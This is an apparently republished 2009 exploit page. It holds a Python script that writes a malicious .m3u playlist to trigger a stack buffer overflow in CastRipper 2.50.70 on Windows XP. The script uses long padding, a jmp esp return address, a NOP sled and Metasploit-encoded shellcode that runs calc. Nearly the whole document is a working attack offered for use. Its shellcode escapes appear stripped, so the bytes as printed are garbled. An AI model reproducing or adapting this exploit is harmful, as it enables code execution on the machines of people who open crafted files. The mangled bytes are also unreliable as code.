Home / os / win10

castripperpy-overflow.txt

Posted on 13 May 2009

#!/usr/bin/python print "**************************************************************************" print " CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit " print " Refer: http://www.milw0rm.com/exploits/8660 " print " Exploit code: super-cristal " print " Tested on: Windows XP Pro SP3 " print " Greetings to:" print " His0k4, all friends & muslims HaCkers(dz),snakespc.com " print "**************************************************************************" # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com shellcode=( "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44" "x42x50x42x30x42x50x4bx58x45x44x4ex53x4bx38x4ex57" "x45x30x4ax37x41x30x4fx4ex4bx58x4fx44x4ax41x4bx48" "x4fx35x42x42x41x50x4bx4ex49x44x4bx58x46x53x4bx58" "x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x48x42x4c" "x46x37x47x30x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e" "x46x4fx4bx33x46x55x46x42x46x30x45x47x45x4ex4bx38" "x4fx35x46x52x41x30x4bx4ex48x56x4bx38x4ex50x4bx44" "x4bx58x4fx35x4ex41x41x50x4bx4ex4bx38x4ex31x4bx38" "x41x50x4bx4ex49x48x4ex35x46x52x46x30x43x4cx41x43" "x42x4cx46x56x4bx38x42x34x42x43x45x38x42x4cx4ax37" "x4ex30x4bx48x42x54x4ex50x4bx38x42x57x4ex31x4dx4a" "x4bx58x4ax46x4ax50x4bx4ex49x30x4bx48x42x38x42x4b" "x42x50x42x50x42x50x4bx38x4ax46x4ex53x4fx35x41x43" "x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx37" "x42x55x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39" "x50x4fx4cx58x50x30x47x55x4fx4fx47x4ex43x36x41x46" "x4ex46x43x36x42x50x5a") buff = "x41" * 17367 buff += "x7DxBCx01x10" # universal jmp esp buff += "x90"*20 buff += shellcode try: out_file = open("exploit.m3u",'w') out_file.write(buff) out_file.close() raw_input(" Exploit file created! ") except: print "Error"

 

TOP